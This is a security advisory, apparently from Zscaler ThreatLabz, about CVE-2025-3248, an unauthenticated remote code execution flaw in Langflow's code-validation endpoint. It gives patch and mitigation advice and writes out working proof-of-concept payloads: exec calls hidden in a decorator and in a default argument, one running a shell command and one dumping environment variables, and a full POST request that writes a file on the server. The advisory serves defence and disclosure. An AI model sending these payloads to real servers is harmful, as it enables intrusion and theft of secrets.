1. SAST Online
  2. Application Security News and Articles
  3. CVE-2025-3248: RCE vulnerability in Langflow
Authenticate your profile to see activity

CVE-2025-3248: RCE vulnerability in Langflow

IntroductionCVE-2025-3248, a critical remote code execution (RCE) vulnerability with a CVSS score of 9.8, has been discovered in Langflow, an open-source platform for visually composing AI-driven agents and workflows. The issue resides in the platform’s /api/v1/validate/code endpoint, which improperly invokes Python’s built-in exec() function on user-supplied code without authentication or sandboxing. This flaw allows attackers to exploit the API and execute arbitrary commands on the server, thus posing a significant risk to organizations using Langflow in their AI development workflows.RecommendationsUpgrade immediately: Users should upgrade to Langflow 1.3.0 or later, where the /api/v1/validate/code endpoint requires authentication.Restrict access: Limit exposure by placing Langflow behind a ZTNA architecture like Zscaler Private Access™ (ZPA) with AppProtection.Implement input sandboxing: If custom validation is needed, avoid using the exec() function with untrusted code or employ sandboxing mechanisms.Monitor and alert: Use detection to flag anomalous requests to validation endpoints and unexpected outgoing connections.Affected VersionsAll Langflow versions prior to 1.3.0 are susceptible to code injection.Vulnerability DetailsLangflow's /api/v1/validate/code endpoint contains a vulnerability in its handling of user-submitted code. In versions prior to 1.3.0, the application uses Python’s compile and exec() to validate function definitions by parsing it into an Abstract Syntax Tree (AST) and processing specific components. The steps include:Parsing the code field using ast.parse().Importing specified modules.Executing function definitions (ast.FunctionDef) to validate their structure.The issue arises from Python’s behavior during function definition, where decorators and default argument values are evaluated immediately. Malicious code embedded in these areas executes during AST processing, enabling attackers to achieve unauthenticated RCE by submitting payloads to the endpoint. The lack of authentication or sandboxing allows exploitation without restriction.An overview of the attack chain is shown below:Figure 1: Attack chain illustrating the progression of exploitation for CVE-2025-3248.How It WorksExploiting CVE-2025-3248 involves the following steps:1. The attacker locates a publicly accessible or an internal Langflow instance (using compromised credentials) running a vulnerable version (prior to 1.3.0).2. The attacker embeds malicious code into either:a. Decorators: Malicious logic placed within a decorator is executed as soon as the AST is processed. In the example below, Here, the exec() invokes an arbitrary command (e.g., to write the system’s id output to a file), which executes immediately when the code is passed to the endpoint. @exec("import os; os.system('id %26gt; /tmp/pwned')")
def foo():
passb. Default function arguments: The attacker can also embed malicious commands into default argument values, which are evaluated at function definition time. In the example below, the payload causes the exec() to retrieve environment variables during AST processing, but the payload can also be used to perform malicious actions.def foo(cmd=exec("__import__('subprocess').check_output(['env'])")):
pass3. The attacker sends the payload to Langflow’s /api/v1/validate/code endpoint via a POST request. Below is an example request that writes a file to the server: POST /api/v1/validate/code HTTP/1.1
Host: vuln-test-langflow.example.com
Content-Type: application/json
Content-Length: 172
{
"code": "@exec(\"with open('hacked.txt', 'w') as f: f.write('This server is vulnerable')\")
def foo():
pass"
}4. When the server processes the payload, the embedded code is executed immediately during validation. An example response is shown below:HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 63
{
"imports": {"errors": []},
"function": {"errors": []}
}Although the response appears benign, the malicious payload has already succeeded in executing and writing to a file named hacked.txt on the server. This same process could also easily be used to write a web shell to the server to facilitate remote access.ConclusionCVE-2025-3248 highlights the risks of executing dynamic code without secure authentication and sandboxing measures. This vulnerability serves as a critical reminder for organizations to approach code-validation features with caution, particularly in applications exposed to the internet. Zscaler ThreatLabz encourages organizations to follow the recommendations outlined in this blog.Zscaler CoverageThe Zscaler ThreatLabz team has deployed protection for CVE-2025-3248.Zscaler Private Access AppProtection932200: RCE Bypass TechniqueDetails related to these signatures can be found in the Zscaler Threat Library.

The post CVE-2025-3248: RCE vulnerability in Langflow appeared first on Security Boulevard.

22 April 2025


>>More